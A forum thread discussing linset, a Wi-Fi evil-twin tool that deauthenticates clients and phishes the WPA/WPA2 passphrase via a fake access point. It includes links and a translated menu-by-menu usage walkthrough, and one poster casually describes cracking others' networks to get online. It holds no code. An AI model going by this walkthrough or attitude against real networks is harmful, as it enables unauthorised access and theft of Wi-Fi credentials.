WPA crack NON-BRUTEFORCE!

Cyberscum

So I ran across a new (2014 release) WPA cracking tool called linset for Kali. Does not use brute force techniques to crack the WPA, It has a very interesting way of capturing the handshake.

The problem is that I believe it was originally written in Spanish. Has anyone played with this or have a good English tutorial to follow?

Here is some general info on it if anyone is interested:


http://www.google.com/url?url=http://black-hat-sec.org/index.php%3Ftopic%3D87.0&rct=j&frm=1&q=&esrc=s&sa=U&ei=XumvVOCBBYysyASUv4HQBg&ved=0CCgQFjAE&usg=AFQjCNH-8W6xpJ8kzcJLJi-LDIyYw6bDJg


https://www.youtube.com/watch?v=dBDDKTbGpgE

the_Grinch

Pretty interesting, I'm surprised the community hasn't come together and translated it to English.

zoro_2009

I understand arabic if any one is interested in the youtube video !

the_Grinch

zoror_2009 translate it man, I'm sure a lot of people will appreciate it and if you do a video with voiceover you'll probably get a ton of hits on YouTube

Cyberscum

the_Grinch wrote: »

Pretty interesting, I'm surprised the community hasn't come together and translated it to English.

They might have, I just cant find anything...I want to really try this out

ryanw4130

I am curious, is it for WPA, but not for WPA2? As far as I know, WPA2 has not been cracked? Sorry for the rookie question here. lol

Cyberscum

ryanw4130 wrote: »

I am curious, is it for WPA, but not for WPA2? As far as I know, WPA2 has not been cracked? Sorry for the rookie question here. lol

Define what you mean by WPA2 has not been cracked (AES?...It has)

Linset can be used on WPA/2

It is not a traditional "crack" you are thinking of...Oh and Aircrack can do something "similar" to this using "Evil Twin" method

LeBroke

I'm assuming this is not resource intensive and can be run on a potato? If so, it'd be awesome.

zoro_2009

Well I looked at the video and there is nothing he sais (no vocal), and the text is nothing but an introduction of what linset is and what it does !
The rest of the video is for the installation only of Linset !
Then in the last seconds of the video, he sais that he will make another video of how to configure and work with the tool !

jaywalker

From what I've understood and read so far, the handshake is captured through deauthentication of client/s (using the aircrack-ng suite). The "non brute force" part of the attack = getting those deauthed clients to connect to your evil twin, and hoping they'd be dumb enough to enter their login credentials on the fake login page.

My assumption is that if the victim does not enter any login information, the handshake cannot be 'checked' against the phished credentials.

Sources Used:

---

Linset's github page (English):
https://github.com/vk496/linset

LINSET 0.14 - WPA/2 Hack sin Fuerza Bruta (Spanish):
LINSET 0.14 - WPA/2 Hack sin Fuerza Bruta

Similar to linset
https://github.com/sophron/wifiphisher

ibn_shaddad

I found this:
شرØ* اداة Linset لجلب باسورد الوايرلس - توزيعة Wifislax - TECH-SECU تقنيات الØ*ماية

It is in Arabic, so I will try my best in translating:

بسم الله الرحمن الرحيم

The tool linset, this tool is considered very dangerous where you can easily one it's victims and you (the victim) can't figure what happened, it is one of the available tools that come with distro Wifislax

The principle behind this tool that it connects to the victim rig and creates an unreal network to deceive him, and pushes a pop up message asking him to enter the pre-shared key one more time to continue the connection, and it looks very much like the fake login pages, but this one still unknown for WiFi users

note: to install the distro click here

To open the tool from wifislax, we go to the main menu and choose wifislax then WPA then linset as shown in the following picture.

after openning we will see a list of available interfaces, as you see we have wlan0, then we choose number 1

now another screen, also choose 1 and continue






then a new screen, and it will start searching for nearby networks



after finishing, it will show all the bearby networks and with every one a number as you can see, and we can notice the a star is located on every network that already has a user, now choose the network number and press enter




now press 1 and enter



again 1 and enter




now here we wait the tool to grab the handshake and that is the goal, after we have it, close the window




after closing the window, we will have the following screen, press 1 and continue



now a screen wil show to ask you to choose what language you want to use in the popup message the victim will see, choose what you want and continue



the following scrren will appear, just wait...



good, now as we can notice in the following pic, it says "key found" and give it to us

ibn_shaddad

are you sure we are not breaking any rules here by posting such things?

NovaHax

Nothing particularly ground-breaking here. Based on some Google Translate pages :-/...it looks like it still relies on a dictionary attack for cracking the EAPOL handshake. And an evil twin capture of the handshake is easy to do with airbase.

Wi-Fu - WPA2-PSK Evil Twin Attack

I did see a screenshot of what may be another option in LINSET that creates a fake access point (presumably with no encryption) and then forces anyone that connects to the attacker hosted AP to web content that asks for a WPA/WPA2 key and then just strips it from the HTTP POST response (in clear-text...thereby avoiding the need to crack the handshake), if the person is dumb enough to do it. It looks absolutely NOTHING like actual WPA authentication...but people are stupid...so I'm sure it still works frequently. But this is a social engineering attack...its not a new technical crack. Its the technical equivalent of going up and asking someone what the passphrase is.

Deathmage

I use Aircrack all the time, comes in handy sometimes when I want to connect to wireless but I don't know the password, just power on my VMware workstation on my laptop, spin up Ubuntu and run the program and wait like 10 minutes. you'd be surprised how simple most wireless password's are...

I used to do aircrack back in college for clients to gauge how strong there wireless password was and to teach them on how to make it stronger and harder to crack. I was a Whitehat well before I even knew what the term even meant...

Whitehat hacking is something I've always wanted to do, I'm just just too busy getting into a niche of system administration since that to me were the money is, but I'm sure security focused hackers make good mulla......someday..

lsud00d

ibn_shaddad wrote: »

are you sure we are not breaking any rules here by posting such things?

As long as everyone understands this is for research purposes only and not used for nefarious reasons, then there is no problem having a scholarly discussion on cracking wifi

Also, I lol'd at LINSET's name...taking a page from GNU

VIDEODROME

I've heard some programs work by exploiting WPS rather than cracking the password. I wonder if this is something like that.